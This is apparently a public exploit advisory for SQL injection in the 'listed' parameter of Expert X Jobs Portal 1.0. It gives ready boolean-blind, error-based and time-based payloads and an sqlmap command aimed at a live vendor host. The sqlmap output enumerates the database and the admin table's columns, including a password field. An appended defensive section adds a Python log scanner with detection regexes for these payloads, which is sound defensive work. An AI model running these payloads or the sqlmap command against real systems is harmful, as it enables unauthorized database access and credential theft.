Expert X Jobs Portal And Resume Builder 1.0 SQL Injection

2022.07.26
Credit: CraCkEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Author    : CraCkEr
Website   : wvidesk.com
Vendor    : WVIDesk
Software  : Expert X - Jobs Portal and Resume Builder v. 1.0
            Expert X can manage jobs, courses, events and scholarships.
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

B4nks-NET irc.b4nks.tk #unix

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius
CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022

GET parameter 'listed' is vulnerable.

---
Parameter: listed (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD

    Type: time-based blind
    Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)
    Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#
---

[+] Starting the Attack

sqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent

[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:03:36] [INFO] fetching current database
[23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers'
current database: 'livexzfv_jobdreamers'

fetching tables for database: 'livexzfv_jobdreamers'

Database: livexzfv_jobdreamers
[56 tables]

fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers'

Database: livexzfv_jobdreamers
Table: siteadminuser
[8 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| aflag    | varchar(2)   |
| desig    | varchar(200) |
| enet     | varchar(450) |
| fullname | varchar(450) |
| id       | int(10)      |
| pw       | varchar(25)  |
| role     | int(10)      |
| users    | varchar(200) |
+----------+--------------+

fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers'

Database: livexzfv_jobdreamers
Table: siteadminuser
[1 entry]

[-] Done
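A defender-side check for the three techniques reported above, added here as an example (it is not part of the original advisory): it scans Apache-style access log lines for boolean-based, error-based and time-based probes in the `listed` parameter. The log lines are constructed, the function names are hypothetical, and treating `listed` as a numeric flag is an assumption based on the `listed=1` request shown.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# One signature per technique the advisory reports for `listed`.
SIGNATURES = {
    "boolean-blind": re.compile(r"'\s*(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(|INFORMATION_SCHEMA", re.I),
    "time-blind": re.compile(r"\b(?:BENCHMARK|SLEEP)\s*\(", re.I),  # SLEEP: not in the advisory
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) [^"]*"')


def classify(value):
    """Return the technique labels matched by a decoded parameter value."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    # Assumption: `listed` is a numeric flag (the advisory only shows listed=1).
    if not hits and not value.isdigit():
        hits.append("non-numeric")
    return hits


def scan(lines, param="listed"):
    """Return (client_ip, labels, decoded_value) for each suspicious request."""
    findings = []
    for m in filter(None, map(LOG_RE.match, lines)):
        ip, target = m.group(1, 2)
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            labels = classify(value)
            if labels:
                findings.append((ip, labels, value))
    return findings


def make_line(ip, value):
    """Build a constructed Apache-style access log line (value URL-encoded)."""
    enc = quote(value, safe="")
    return f'{ip} - - [26/Jul/2022:23:03:36 +0000] "GET /companies?listed={enc} HTTP/1.1" 200 5120'


SAMPLE_LOG = [  # constructed sample; documentation-range IPs, payload shapes from the advisory
    make_line("192.0.2.10", "1"),
    make_line("198.51.100.7", "1' AND 6926=6926 AND 'ZFlv'='ZFlv"),
    make_line("198.51.100.7", "1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#"),
]

if __name__ == "__main__":
    for ip, labels, value in scan(SAMPLE_LOG):
        print(ip, ",".join(labels), repr(value))
```

The sqlmap run above used --random-agent, so the User-Agent field is not a reliable indicator for this activity; the decoded parameter value is.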


Copyright 2022, cxsecurity.com